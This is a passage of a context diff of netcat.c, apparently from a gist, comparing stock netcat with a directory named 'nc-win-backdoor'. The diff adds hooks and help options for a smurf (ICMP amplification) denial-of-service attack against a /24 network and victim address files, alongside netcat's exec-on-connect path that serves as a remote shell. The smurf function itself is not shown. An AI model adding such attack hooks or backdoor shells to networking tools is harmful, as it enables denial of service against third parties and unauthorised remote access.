bail ("nc -h for help");
***************
*** 1873,1879 ****
}
#endif /* G_S_H */
if (o_wfile) {
! ofd = open (stage, O_WRONLY | O_CREAT | O_TRUNC, 0664);
if (ofd <= 0) /* must be > extant 0/1/2 */
bail ("can't open %s", stage);
stage = (unsigned char *) Hmalloc (100);
--- 2571,2577 ----
}
#endif /* G_S_H */
if (o_wfile) {
! ofd = open (( const char *)stage, O_WRONLY | O_CREAT | O_TRUNC, 0664);
if (ofd <= 0) /* must be > extant 0/1/2 */
bail ("can't open %s", stage);
stage = (unsigned char *) Hmalloc (100);
***************
*** 1914,1919 ****
--- 2612,2618 ----
#ifdef GAPING_SECURITY_HOLE
if (pr00gie) /* -e given? */
doexec (netfd);
+
#ifdef WIN32
if (!pr00gie) // doexec does the read/write for win32
#endif
***************
*** 1986,1992 ****
#ifdef GAPING_SECURITY_HOLE
if (pr00gie) /* exec is valid for outbound, too */
doexec (netfd);
! #endif /* GAPING_SECURITY_HOLE */
if (! o_zero)
#ifdef WIN32
#ifdef GAPING_SECURITY_HOLE
--- 2685,2698 ----
#ifdef GAPING_SECURITY_HOLE
if (pr00gie) /* exec is valid for outbound, too */
doexec (netfd);
! #endif /* GAPING_SECURITY_HOLE */
! #ifdef SMURF_ATTACK
! if(x_smurf_victime) {
! if(x_smurf_attack) {
! x_smurf(netfd,x_smurf_victime,x_smurf_attack);
! }
! }
! #endif
if (! o_zero)
#ifdef WIN32
#ifdef GAPING_SECURITY_HOLE
***************
*** 2067,2082 ****
-o file hex dump of traffic\n\
-p port local port number\n\
-r randomize local and remote ports\n\
! -s addr local source address");
! #ifdef TELNET
! holler ("\
! -t answer TELNET negotiation");
! #endif
! holler ("\
-u UDP mode\n\
-v verbose [use twice to be more verbose]\n\
-w secs timeout for connects and final net reads\n\
-z zero-I/O mode [used for scanning]");
bail ("port numbers can be individual or ranges: m-n [inclusive]");
return(0);
} /* helpme */
--- 2773,2792 ----
-o file hex dump of traffic\n\
-p port local port number\n\
-r randomize local and remote ports\n\
! -s addr local source address\n\
! -t answer TELNET negotiation\n\
-u UDP mode\n\
-v verbose [use twice to be more verbose]\n\
-w secs timeout for connects and final net reads\n\
-z zero-I/O mode [used for scanning]");
+ #ifdef SMURF_ATTACK
+ holler ("\
+ -x addr/24 attack smurf attack on /24 listen");
+ #ifdef SMURF_ATTACK
+ holler ("\
+ -X file to cointain victime addr smurf attack");
+ #endif
+ #endif
bail ("port numbers can be individual or ranges: m-n [inclusive]");
return(0);
} /* helpme */
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: netcat.c~
Les fichiers binaires /home/swilting/Téléchargements/nc/netcat.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.o sont différents.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment